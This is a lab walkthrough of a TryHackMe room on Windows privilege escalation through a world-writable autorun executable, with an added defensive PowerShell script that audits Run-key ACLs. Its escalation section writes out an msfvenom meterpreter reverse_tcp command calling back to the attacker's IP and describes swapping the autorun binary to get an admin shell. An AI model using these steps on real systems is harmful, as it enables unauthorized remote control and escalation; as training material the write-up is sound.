🏃♂️Autoruns
https://tryhackme.com/room/windowsprivescarena
Autoruns is a powerful utility designed for Windows users to manage and control programs that launch automatically when the computer starts. In simpler terms, it allows you to see and control what applications and services run during your computer's startup process.
Steps to Identify and Exploit Autorun for Privilege Escalation
Connect via RDP from the Linux (Kali) machine to the Windows machine.
Run Autoruns64.exe: execute
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
in an administrative command prompt to list the programs that start automatically.
At the very top of the list we can see an entry called "My Program":
Check permissions with accesschk: run
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
to list who has write access to the file.
Look for overly broad access, because it can lead to privilege escalation.
What we are looking for is a file that runs automatically and on which Everyone has full access: such a file can be replaced, and when an administrator logs in and the autorun executes, it runs with the administrator's privileges.
PowerUp Analysis:
Navigate to
C:\Users\user\Desktop\Tools\PowerUp
and start PowerShell with
powershell -ep bypass
Dot-source the script with
. .\PowerUp.ps1
and run
Invoke-AllChecks
to identify autorun files and assess their permissions.
It identifies the autorun file and reports that Everyone has RWX on it; this comes into play shortly.
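An added audit script (not part of the room, Sysinternals or PowerUp) that automates the same check from the defender's side: it walks the standard Run keys, resolves each command to its executable and reports any entry that Everyone or another non-admin principal can modify. The list of weak principals is an assumption; remediation is to strip those write rights (for example with icacls) so that only administrators can change startup binaries.

```powershell
# Added audit example (not from the room, Sysinternals or PowerUp).
# Enumerates HKLM/HKCU Run keys and reports autorun executables that
# non-admin principals can modify, i.e. the "Everyone: Full Control" case.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
# Assumption: principals that should never be able to write a startup binary.
$weakPrincipals = @('Everyone', 'BUILTIN\Users',
                    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Any of these rights lets the caller swap the file contents.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor `
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor `
             [System.Security.AccessControl.FileSystemRights]::Modify -bor `
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-AutorunTarget {
    param([string]$Command)
    # Expand %VARS%, then take the quoted path or the first token; drop arguments.
    $cmd = [Environment]::ExpandEnvironmentVariables($Command)
    if ($cmd -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($cmd -split '\s+')[0]
}

function Test-WeakAutorunAcl {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        $names = ($props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' }).Name
        foreach ($name in $names) {
            $target = Get-AutorunTarget -Command ([string]$props.$name)
            if ([string]::IsNullOrWhiteSpace($target) -or -not (Test-Path -LiteralPath $target)) { continue }
            $acl = Get-Acl -LiteralPath $target
            foreach ($ace in $acl.Access) {
                $isWeak      = $weakPrincipals -contains $ace.IdentityReference.Value
                $grantsWrite = ($ace.FileSystemRights -band $writeMask) -ne 0
                if ($ace.AccessControlType -eq 'Allow' -and $isWeak -and $grantsWrite) {
                    [pscustomobject]@{ Key = $key; Entry = $name; Path = $target
                                       Principal = $ace.IdentityReference.Value
                                       Rights = $ace.FileSystemRights }
                }
            }
        }
    }
}

Test-WeakAutorunAcl | Format-Table -AutoSize
```

This covers only the Run keys; Autoruns itself inspects many more launch points (services, scheduled tasks, Winlogon, etc.), so treat an empty result as one check passed, not a clean system.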
Escalation
Prepare Kali:
Open two terminals. Launch
msfconsole
in one and check the Kali IP with
ip a
in the other.
Generate Malicious Executable:
Use
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
This creates program.exe:
On the msfconsole terminal:
Now go back to the other terminal and move the file:
Host Local Server:
Move the executable to the server directory and start a local web server with
python -m http.server 4040
Replace Autorun File:
Fetch the file on the Windows machine over the RDP session and replace the autorun file with the generated executable.
Simulate Admin Login:
Disconnect RDP and reconnect using the admin credentials obtained earlier (in the intro of this box). This simulates an administrator logging in, which is what triggers the autorun.
Exploit Success:
When the session opens, a pop-up appears. Check
msfconsole
for a successful shell connection.